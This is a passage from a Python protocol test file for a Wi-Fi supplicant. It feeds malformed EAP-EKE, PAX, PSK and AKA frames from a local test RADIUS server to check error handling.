0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short EAP-EKE-Confirm/Request")
return struct.pack(">BBHBB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1,
EAP_TYPE_EKE,
EAP_EKE_CONFIRM)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid EAP-EKE-ID/Request")
return struct.pack(">BBHBBBB4BB",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 2 + 4 + 1,
EAP_TYPE_EKE,
EAP_EKE_ID,
1, 0,
1, 1, 1, 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: All zeroes DHComponent_S and empty CBvalue in EAP-EKE-Commit/Request")
return struct.pack(">BBHBB4L32L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 128,
EAP_TYPE_EKE,
EAP_EKE_COMMIT,
0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid PNonce_PS and Auth_S values in EAP-EKE-Confirm/Request")
return struct.pack(">BBHBB4L8L5L5L",
EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 2 * 16 + 20 + 20,
EAP_TYPE_EKE,
EAP_EKE_CONFIRM,
0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0,
0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(eke_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 14):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="EKE", identity="user", password="password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13 ]:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
else:
time.sleep(0.05)
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
EAP_PAX_OP_STD_1 = 0x01
EAP_PAX_OP_STD_2 = 0x02
EAP_PAX_OP_STD_3 = 0x03
EAP_PAX_OP_SEC_1 = 0x11
EAP_PAX_OP_SEC_2 = 0x12
EAP_PAX_OP_SEC_3 = 0x13
EAP_PAX_OP_SEC_4 = 0x14
EAP_PAX_OP_SEC_5 = 0x15
EAP_PAX_OP_ACK = 0x21
EAP_PAX_FLAGS_MF = 0x01
EAP_PAX_FLAGS_CE = 0x02
EAP_PAX_FLAGS_AI = 0x04
EAP_PAX_MAC_HMAC_SHA1_128 = 0x01
EAP_PAX_HMAC_SHA256_128 = 0x02
EAP_PAX_DH_GROUP_NONE = 0x00
EAP_PAX_DH_GROUP_2048_MODP = 0x01
EAP_PAX_DH_GROUP_3072_MODP = 0x02
EAP_PAX_DH_GROUP_NIST_ECC_P_256 = 0x03
EAP_PAX_PUBLIC_KEY_NONE = 0x00
EAP_PAX_PUBLIC_KEY_RSAES_OAEP = 0x01
EAP_PAX_PUBLIC_KEY_RSA_PKCS1_V1_5 = 0x02
EAP_PAX_PUBLIC_KEY_EL_GAMAL_NIST_ECC = 0x03
EAP_PAX_ADE_VENDOR_SPECIFIC = 0x01
EAP_PAX_ADE_CLIENT_CHANNEL_BINDING = 0x02
EAP_PAX_ADE_SERVER_CHANNEL_BINDING = 0x03
def test_eap_proto_pax(dev, apdev):
"""EAP-PAX protocol tests"""
def pax_std_1(ctx):
logger.info("Test: STD-1")
ctx['id'] = 10
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0x16, 0xc9, 0x08, 0x9d, 0x98, 0xa5, 0x6e, 0x1f,
0xf0, 0xac, 0xcf, 0xc4, 0x66, 0xcd, 0x2d, 0xbf)
def pax_handler(ctx, req):
logger.info("pax_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_PAX)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Minimum length payload")
return struct.pack(">BBHB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 16,
EAP_TYPE_PAX,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported MAC ID")
return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, 255, EAP_PAX_DH_GROUP_NONE,
EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported DH Group ID")
return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
255, EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported Public Key ID")
return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, 255,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: More fragments")
return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, EAP_PAX_FLAGS_MF,
EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid ICV")
return struct.pack(">BBHBBBBBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalid ICV in short frame")
return struct.pack(">BBHBBBBBB3L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 12,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Correct ICV - unsupported op_code")
ctx['id'] = 10
return struct.pack(">BBHBBBBBB16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
255, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0x90, 0x78, 0x97, 0x38, 0x29, 0x94, 0x32, 0xd4,
0x81, 0x27, 0xe0, 0xf6, 0x3b, 0x0d, 0xb2, 0xb2)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Correct ICV - CE flag in STD-1")
ctx['id'] = 10
return struct.pack(">BBHBBBBBB16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, EAP_PAX_FLAGS_CE,
EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0x9c, 0x98, 0xb4, 0x0b, 0x94, 0x90, 0xde, 0x88,
0xb7, 0x72, 0x63, 0x44, 0x1d, 0xe3, 0x7c, 0x5c)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Correct ICV - too short STD-1 payload")
ctx['id'] = 10
return struct.pack(">BBHBBBBBB16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0xda, 0xab, 0x2c, 0xe7, 0x84, 0x41, 0xb5, 0x5c,
0xee, 0xcf, 0x62, 0x03, 0xc5, 0x69, 0xcb, 0xf4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Correct ICV - incorrect A length in STD-1")
ctx['id'] = 10
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
0, 0, 0, 0, 0, 0, 0, 0, 0,
0xc4, 0xb0, 0x81, 0xe4, 0x6c, 0x8c, 0x20, 0x23,
0x60, 0x46, 0x89, 0xea, 0x94, 0x60, 0xf3, 0x2a)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Correct ICV - extra data in STD-1")
ctx['id'] = 10
return struct.pack(">BBHBBBBBBH8LB16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 1 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
1,
0x61, 0x49, 0x65, 0x37, 0x21, 0xe8, 0xd8, 0xbf,
0xf3, 0x02, 0x01, 0xe5, 0x42, 0x51, 0xd3, 0x34)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected STD-1")
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0xe5, 0x1d, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
idx += 1
if ctx['num'] == idx:
return pax_std_1(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: MAC ID changed during session")
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_HMAC_SHA256_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0xee, 0x00, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
idx += 1
if ctx['num'] == idx:
return pax_std_1(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: DH Group ID changed during session")
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_2048_MODP,
EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0xee, 0x01, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
idx += 1
if ctx['num'] == idx:
return pax_std_1(ctx)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Public Key ID changed during session")
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_1, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE,
EAP_PAX_PUBLIC_KEY_RSAES_OAEP,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0xee, 0x02, 0xbf, 0xb8, 0x70, 0x20, 0x5c, 0xba,
0x41, 0xbb, 0x34, 0xda, 0x1a, 0x08, 0xe6, 0x8d)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected STD-3")
ctx['id'] = 10
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_3, 0, EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0x47, 0xbb, 0xc0, 0xf9, 0xb9, 0x69, 0xf5, 0xcb,
0x3a, 0xe8, 0xe7, 0xd6, 0x80, 0x28, 0xf2, 0x59)
idx += 1
if ctx['num'] == idx:
return pax_std_1(ctx)
idx += 1
if ctx['num'] == idx:
# TODO: MAC calculation; for now, this gets dropped due to incorrect
# ICV
logger.info("Test: STD-3 with CE flag")
return struct.pack(">BBHBBBBBBH8L16B", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 5 + 2 + 32 + 16,
EAP_TYPE_PAX,
EAP_PAX_OP_STD_3, EAP_PAX_FLAGS_CE,
EAP_PAX_MAC_HMAC_SHA1_128,
EAP_PAX_DH_GROUP_NONE, EAP_PAX_PUBLIC_KEY_NONE,
32, 0, 0, 0, 0, 0, 0, 0, 0,
0x8a, 0xc2, 0xf9, 0xf4, 0x8b, 0x75, 0x72, 0xa2,
0x4d, 0xd3, 0x1e, 0x54, 0x77, 0x04, 0x05, 0xe2)
idx += 1
if ctx['num'] & 0x1 == idx & 0x1:
logger.info("Test: Default request")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_PAX)
else:
logger.info("Test: Default EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(pax_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 18):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="user",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=False)
logger.info("Waiting for EAP method to start")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.05)
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
logger.info("Too short password")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="user",
password_hex="0123456789abcdef0123456789abcd",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
logger.info("No password")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PAX", identity="user",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
def test_eap_proto_psk(dev, apdev):
"""EAP-PSK protocol tests"""
def psk_handler(ctx, req):
logger.info("psk_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_PSK)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Non-zero T in first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0xc0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short third message")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_PSK)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Incorrect T in third message")
return struct.pack(">BBHBB4L4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing PCHANNEL in third message")
return struct.pack(">BBHBB4L4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 16,
EAP_TYPE_PSK, 0x80, 0, 0, 0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Invalic MAC_S in third message")
return struct.pack(">BBHBB4L4L5LB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16 + 16 + 21,
EAP_TYPE_PSK, 0x80, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Valid first message")
return struct.pack(">BBHBB4L", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 16,
EAP_TYPE_PSK, 0, 0, 0, 0, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(psk_handler)
try:
hapd = start_ap(apdev[0]['ifname'])
for i in range(0, 6):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="user",
password_hex="0123456789abcdef0123456789abcdef",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
logger.info("Test: Invalid PSK length")
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PSK", identity="user",
password_hex="0123456789abcdef0123456789abcd",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
time.sleep(0.1)
dev[0].request("REMOVE_NETWORK all")
finally:
stop_radius_server(srv)
EAP_SIM_SUBTYPE_START = 10
EAP_SIM_SUBTYPE_CHALLENGE = 11
EAP_SIM_SUBTYPE_NOTIFICATION = 12
EAP_SIM_SUBTYPE_REAUTHENTICATION = 13
EAP_SIM_SUBTYPE_CLIENT_ERROR = 14
EAP_AKA_SUBTYPE_CHALLENGE = 1
EAP_AKA_SUBTYPE_AUTHENTICATION_REJECT = 2
EAP_AKA_SUBTYPE_SYNCHRONIZATION_FAILURE = 4
EAP_AKA_SUBTYPE_IDENTITY = 5
EAP_AKA_SUBTYPE_NOTIFICATION = 12
EAP_AKA_SUBTYPE_REAUTHENTICATION = 13
EAP_AKA_SUBTYPE_CLIENT_ERROR = 14
EAP_SIM_AT_RAND = 1
EAP_SIM_AT_AUTN = 2
EAP_SIM_AT_RES = 3
EAP_SIM_AT_AUTS = 4
EAP_SIM_AT_PADDING = 6
EAP_SIM_AT_NONCE_MT = 7
EAP_SIM_AT_PERMANENT_ID_REQ = 10
EAP_SIM_AT_MAC = 11
EAP_SIM_AT_NOTIFICATION = 12
EAP_SIM_AT_ANY_ID_REQ = 13
EAP_SIM_AT_IDENTITY = 14
EAP_SIM_AT_VERSION_LIST = 15
EAP_SIM_AT_SELECTED_VERSION = 16
EAP_SIM_AT_FULLAUTH_ID_REQ = 17
EAP_SIM_AT_COUNTER = 19
EAP_SIM_AT_COUNTER_TOO_SMALL = 20
EAP_SIM_AT_NONCE_S = 21
EAP_SIM_AT_CLIENT_ERROR_CODE = 22
EAP_SIM_AT_KDF_INPUT = 23
EAP_SIM_AT_KDF = 24
EAP_SIM_AT_IV = 129
EAP_SIM_AT_ENCR_DATA = 130
EAP_SIM_AT_NEXT_PSEUDONYM = 132
EAP_SIM_AT_NEXT_REAUTH_ID = 133
EAP_SIM_AT_CHECKCODE = 134
EAP_SIM_AT_RESULT_IND = 135
EAP_SIM_AT_BIDDING = 136
def test_eap_proto_aka(dev, apdev):
"""EAP-AKA protocol tests"""
def aka_handler(ctx, req):
logger.info("aka_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1,
EAP_TYPE_AKA)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unknown subtype")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, 255, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Client Error")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CLIENT_ERROR, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short attribute header")
return struct.pack(">BBHBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0, 255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated attribute")
return struct.pack(">BBHBBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0, 255,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short attribute data")
return struct.pack(">BBHBBHBB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0, 255,
0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Skippable/non-skippable unrecognzized attribute")
return struct.pack(">BBHBBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 1 + 10,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
255, 1, 0, 127, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request without ID type")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request ANY_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_ANY_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request FULLAUTH_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_FULLAUTH_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request PERMANENT_ID")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Identity request PERMANENT_ID (duplicate)")
return struct.pack(">BBHBBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3 + 4,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_IDENTITY, 0,
EAP_SIM_AT_PERMANENT_ID_REQ, 1, 0)
idx += 1
if ctx['num'] == idx:
logger.info("Test: EAP-Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge with no attributes")
return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 3,
EAP_TYPE_AKA, EAP_AKA_SUBTYPE_CHALLENGE, 0)
idx += 1
